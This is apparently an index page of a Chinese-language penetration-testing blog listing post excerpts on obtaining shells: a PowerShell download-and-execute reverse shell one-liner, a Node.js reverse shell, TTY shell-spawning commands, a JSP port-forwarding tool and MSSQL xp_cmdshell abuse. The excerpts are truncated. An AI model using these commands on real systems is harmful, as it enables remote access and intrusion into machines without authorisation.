Dragon
Get shell By Powershell

Get shell By Powershell

1个月前 (02-20) 50 0

Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadStr...

Node.js 反向 Shell

Node.js 反向 Shell

1个月前 (02-20) 22 0

如下的 Javascript 就是一个 Node.js 的反向连接 shell 这个 payload 将会生成一个/bin/sh 的 shell,创建一个 TCP 连接到攻击者的服务器,并且在通信数据流中绑定 shell 命令...

Spawning a TTY Shell

Spawning a TTY Shell

1个月前 (02-11) 37 0

python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') /bin/sh -i perl —e 'exec "/...

jsp 版本 lcx

jsp 版本 lcx

2个月前 (01-11) 52 0

https://www.lshack.cn/lcx.jsp m = listen 需要参数:lp、lp2 该模式下,会在本地监听两个端口,相互转发数据 m = tran 需要参数:lip、lp、rip...

Mssql 的 xp_cmdshell 组件执行 FTP 命令

Mssql 的 xp_cmdshell 组件执行 FTP 命令

3个月前 (12-21) 127 0

情况较为特殊,只有目录 C:\Windows\Temp\,有上传权限: 这里下载的文件默认下载到 c:\user\你当前用户名 目录下方,但是这个目录没可写。即便下载了也没戏,因为根本没存进去。 于是接着...

切换注册

登录

忘记密码 ?

切换登录

注册

验证码

扫一扫二维码分享